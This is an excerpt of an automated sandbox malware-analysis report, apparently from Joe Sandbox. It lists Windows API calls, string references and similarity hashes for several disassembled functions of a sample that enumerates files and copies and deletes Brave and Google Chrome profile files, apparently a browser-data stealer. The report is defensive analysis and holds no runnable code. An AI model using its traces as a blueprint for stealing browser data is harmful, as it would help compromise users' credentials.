                                • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                                • lstrlen.KERNEL32(003C1794), ref: 00391909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391929
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391966
                                • lstrlen.KERNEL32(\*.*), ref: 00391971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 0039199A
                                  • Part of subcall function 003B4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003B406D
                                  • Part of subcall function 003B4040: lstrcpy.KERNEL32(00000000,?), ref: 003B40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003919C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391A16
                                • lstrlen.KERNEL32(003C1794), ref: 00391A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A41
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391A81
                                • lstrlen.KERNEL32(003C1794), ref: 00391A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391AAC
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00391B45
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 00391B70
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 00391B8A
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391C03
                                • lstrlen.KERNEL32(003C1794), ref: 00391C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C31
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391C74
                                • lstrlen.KERNEL32(003C1794), ref: 00391C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CA2
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391CAE
                                • lstrlen.KERNEL32(?), ref: 00391CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00391CE9
                                • lstrlen.KERNEL32(003C1794), ref: 00391CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391D14
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391DEB
                                • lstrlen.KERNEL32(003C1794), ref: 00391DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E19
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00391E56
                                • lstrlen.KERNEL32(003C1794), ref: 00391E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391E81
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E8D
                                • lstrlen.KERNEL32(?), ref: 00391E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00391EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00391F45
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                                • lstrlen.KERNEL32(00F78C18), ref: 00391FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                                • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                                • lstrlen.KERNEL32(003C1794), ref: 00392058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                                • Instruction ID: dd5b51f2e0ed7f9c1e467a6ba917308ba3be589c513f201c384b9c29a1afc4e0
                                • Opcode Fuzzy Hash: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                                • Instruction Fuzzy Hash: 56925B31912A1BAFCF23AFA4DD89EAF77B9AF54700F054124F805AB251DB349D15CBA0
                                Function 0039DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                                • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                                • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                                • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                                • lstrlen.KERNEL32(?), ref: 0039DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                                • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                                • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                                • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                                • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                                • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                                • lstrlen.KERNEL32(00F78C18), ref: 0039E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                                • lstrcat.KERNEL32(00000000,00F78C18), ref: 0039E269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 0039E274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0039E2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E349
                                • DeleteFileA.KERNEL32(?), ref: 0039E381
                                • StrCmpCA.SHLWAPI(?,00F7DE10), ref: 0039E3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E445
                                • StrCmpCA.SHLWAPI(?,00F78BB8), ref: 0039E468
                                • StrCmpCA.SHLWAPI(?,00F788B8), ref: 0039E47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 0039E4E0
                                • StrCmpCA.SHLWAPI(?,00F7DC60), ref: 0039E58E
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E639
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E678
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E737
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0039E776
                                • DeleteFileA.KERNEL32(?), ref: 0039E7D2
                                • StrCmpCA.SHLWAPI(?,00F78AA8), ref: 0039E7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E916
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E952
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                                • Instruction ID: 43d79c37a9653b4f5796dc08d26186ed0c8f16b9f7dbd8dd2d8260346c405859
                                • Opcode Fuzzy Hash: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                                • Instruction Fuzzy Hash: 47925F7191161AAFCF22EFA4DC8AEAF77B9AF54300F054528F846AB251DB34DC45CB90
                                Function 003A18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A18D2
                                • lstrlen.KERNEL32(\*.*), ref: 003A18DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A18FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 003A190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A1947
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A1967
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1981
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19BF
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A4C
                                • lstrlen.KERNEL32(003C1794), ref: 003A1A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A80
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AB4
                                • lstrlen.KERNEL32(?), ref: 003A1AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 003A1AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B19
                                • lstrlen.KERNEL32(00F78AB8), ref: 003A1B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B8F
                                • lstrlen.KERNEL32(003C1794), ref: 003A1BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BC3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C57
                                • lstrlen.KERNEL32(003C1794), ref: 003A1C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C8B
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D21
                                • lstrlen.KERNEL32(003C1794), ref: 003A1D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D55
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A1DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DED
                                • lstrlen.KERNEL32(003C1794), ref: 003A1E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E36
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E68
                                • lstrlen.KERNEL32(00F7DD68), ref: 003A1E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EB2
                                • lstrlen.KERNEL32(003C1794), ref: 003A1EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EE3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F15
                                • lstrlen.KERNEL32(00F7E6F8), ref: 003A1F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F5F
                                • lstrlen.KERNEL32(003C1794), ref: 003A1F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F90
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1FC2
                                • lstrlen.KERNEL32(00F6A6F8), ref: 003A1FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2036
                                • lstrlen.KERNEL32(003C1794), ref: 003A2048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2067
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A2073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2098
                                • lstrlen.KERNEL32(?), ref: 003A20AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A20D0
                                • lstrcat.KERNEL32(00000000,?), ref: 003A20DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2103
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A213F
                                • lstrlen.KERNEL32(00F7DD38), ref: 003A214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A2181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                                • Instruction ID: afe61adb01873c9f32c7238108e3b51f9d9a09accf43fb207d7be4c6c0ef178a
                                • Opcode Fuzzy Hash: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                                • Instruction Fuzzy Hash: FC623D31912A16AFCB23AB64CC49EBF77B9EF55700F0A0128F805AB251DB34DD15DBA0
                                Function 003A3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 003A392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 003A3943
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A396C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A3986
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A39BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A39E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A39F2
                                • lstrlen.KERNEL32(003C1794), ref: 003A39FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A1A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3A26
                                • lstrlen.KERNEL32(?), ref: 003A3A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A53
                                • lstrcat.KERNEL32(00000000,?), ref: 003A3A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A8A
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A3ACE
                                • lstrlen.KERNEL32(?), ref: 003A3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B36
                                • lstrlen.KERNEL32(003C1794), ref: 003A3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B6A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B9E
                                • lstrlen.KERNEL32(?), ref: 003A3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 003A3BE0
                                • lstrlen.KERNEL32(00F78C18), ref: 003A3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C3C
                                • lstrlen.KERNEL32(00F78AB8), ref: 003A3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CB7
                                • lstrlen.KERNEL32(003C1794), ref: 003A3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CE8
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D79
                                • lstrlen.KERNEL32(003C1794), ref: 003A3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DAD
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E43
                                • lstrlen.KERNEL32(003C1794), ref: 003A3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E77
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F0D
                                • lstrlen.KERNEL32(003C1794), ref: 003A3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F41
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F75
                                • lstrlen.KERNEL32(?), ref: 003A3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 003A3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FE0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A401F
                                • lstrlen.KERNEL32(00F7DD38), ref: 003A402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A408A
